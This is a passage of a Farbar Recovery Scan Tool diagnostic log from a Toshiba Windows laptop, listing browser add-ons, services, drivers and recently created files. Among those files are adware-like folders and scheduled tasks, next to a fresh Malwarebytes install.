{9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.) BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.) BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.) 
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Lexmark Toolbar - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\.DEFAULT -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - No File
Toolbar: HKU\.DEFAULT -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File

FireFox:
========
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Default
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa2.dll [2008-08-20] (Google, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa3.dll [2015-02-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2015-05-18] (Coupons, Inc.)
FF Extension: Search Web Know - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\Extensions\{c220f16f-ba07-4e7e-98e9-662f66164d42}.xpi [2016-01-22] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2014-11-18] [not signed]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 camsvc; C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe [20544 2009-04-16] (TOSHIBA)
R2 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2009-03-06] (TOSHIBA CORPORATION) [File not signed]
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [1414128 2015-05-18] (Coupons.com Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed]
S3 lxcy_device; C:\Windows\system32\lxcycoms.exe [465408 2006-02-20] ( )
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation) R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation) R2 RSELSVC; C:\Program Files\TOSHIBA\rselect\RSelSvc.exe [55808 2009-02-19] (TOSHIBA Corporation) [File not signed] R2 TNaviSrv; C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2009-03-30] (TOSHIBA Corporation) R2 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed] R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [251392 2009-04-14] (TOSHIBA Corporation) [File not signed] R2 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [84480 2009-03-17] (TOSHIBA Corporation) [File not signed] R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation) R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2014-11-18] (Webroot Software, Inc. ) ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation) R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation) R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. 
(www.webroot.com)) R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2016-01-23] () S3 IpInIp; system32\DRIVERS\ipinip.sys [X] S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X] S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-01-26 03:06 - 2016-01-26 03:06 - 00019243 _____ C:\Users\Barbara\Desktop\FRST.txt 2016-01-26 03:04 - 2016-01-26 03:06 - 00000000 ____D C:\FRST 2016-01-26 03:04 - 2016-01-25 13:24 - 02370560 _____ (Farbar) C:\Users\Barbara\Desktop\FRST64.exe 2016-01-23 18:13 - 2016-01-23 18:21 - 00076944 _____ C:\Windows\ntbtlog.txt 2016-01-23 17:05 - 2016-01-24 02:52 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2016-01-23 17:05 - 2016-01-23 17:05 - 00000952 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-01-23 17:05 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys 2016-01-23 17:05 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2016-01-23 17:05 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2016-01-23 17:02 - 2016-01-23 17:03 - 22908888 _____ (Malwarebytes ) C:\Users\Barbara\Downloads\mbam-setup-2.2.0.1024.exe 
2016-01-23 16:24 - 2016-01-23 16:24 - 00003446 _____ C:\Windows\System32\Tasks\Brooucnejo 2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\WebBar 2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files\WebBar 2016-01-23 16:18 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\rqNhmm 2016-01-23 16:18 - 2016-01-23 18:06 - 00000000 ____D C:\ProgramData\CrimeWatch 2016-01-23 16:12 - 2014-08-18 15:51 - 00971576 ____N C:\Windows\system32\pmls64.dll 2016-01-23 16:12 - 2014-08-18 15:51 - 00660792 ____N C:\Windows\SysWOW64\pmls.dll 2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin 2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care 2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files (x86)\OneSystemCare 2016-01-23 16:11 - 2016-01-23 16:11 - 00023252 _____ C:\Windows\System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} 2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-6363-0 2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-08c3-1 2016-01-23 16:10 - 2016-01-26 03:06 - 00000270 _____ C:\Windows\Tasks\PubMach138.job 2016-01-23 16:10 - 2016-01-23 23:38 - 00000274 _____ C:\Windows\Tasks\OutstandinDivisio6.job 2016-01-23 16:10 - 2016-01-23 19:43 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrazDivisio519 2016-01-23 16:10 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\NowUSeeItPlayer 2016-01-23 16:10 - 2016-01-23 18:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\RustiSens806 2016-01-23 16:10 - 2016-01-23 16:10 - 00003162 _____ C:\Windows\System32\Tasks\OutstandinDivisio6 2016-01-23 16:10 - 2016-01-23 16:10 - 00003154 _____ C:\Windows\System32\Tasks\PubMach138 2016-01-17 12:03 - 2015-12-08 12:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-01-17 12:03 - 2015-12-08 
11:39 - 01065984 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 02873344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 01567744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01377792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01326080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 01114624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00767488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00759296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00605184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00613888 _____ (Microsoft 
Corporation) C:\Windows\SysWOW64\MSMPEG2VDEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ADEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax 2016-01-17 11:58 - 2015-12-05 12:02 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll 2016-01-17 11:58 - 2015-12-05 11:41 - 01886208 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01539072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01350656 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01127424 _____ (Microsoft Corporation) 
C:\Windows\system32\WMADMOE.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01090560 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll 2016-01-17 11:58 - 2015-12-05 11:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00819200 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00732160 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 03548672 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 01571328 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00620544 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00352256 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00301056 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00223232 _____ (Microsoft Corporation) 
C:\Windows\system32\RESAMPLEDMO.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 01074176 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00471040 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax 2016-01-17 11:58 - 2015-12-05 11:39 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll 2016-01-17 11:58 - 2015-12-05 11:22 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys 2016-01-17 11:57 - 2015-12-05 12:03 - 00304640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll 2016-01-17 11:57 - 2015-12-05 11:39 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2016-01-17 11:48 - 2015-12-30 11:47 - 04694464 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-01-16 08:53 - 2015-12-15 17:28 - 17892352 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-01-16 08:53 - 2015-12-15 17:25 - 02350080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-01-16 08:53 - 2015-12-15 17:21 - 10938368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-01-16 08:53 - 2015-12-15 17:20 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-01-16 08:53 - 2015-12-15 17:20 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-01-16 
08:53 - 2015-12-15 17:19 - 02158080 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-01-16 08:53 - 2015-12-15 17:19 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-01-16 08:53 - 2015-12-15 17:18 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-01-16 08:53 - 2015-12-15 17:18 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-01-16 08:53 - 2015-12-15 17:18 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2016-01-16 08:53 - 2015-12-15 17:18 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2016-01-16 08:53 - 2015-12-15 16:50 - 01814528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-01-16 08:53 - 2015-12-15 16:49 - 12388864 
_____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-01-16 08:53 - 2015-12-15 16:47 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-01-16 08:53 - 2015-12-15 16:46 - 09753088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-01-16 08:53 - 2015-12-15 16:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-01-16 08:53 - 2015-12-15 16:45 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-01-16 08:53 - 2015-12-15 16:44 - 00718848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-01-16 08:53 - 2015-12-15 16:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-01-16 08:53 - 2015-12-15 16:43 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00041472 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\msfeedsbs.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe 2016-01-16 08:52 - 2015-12-15 16:43 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe 2016-01-16 08:08 - 2015-12-05 10:34 - 02799616 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll 2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll 2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll 2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll 2016-01-16 08:07 - 2015-11-13 10:27 - 00013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe 2016-01-15 14:36 - 2016-01-15 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus 2016-01-08 20:17 - 2016-01-16 07:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 
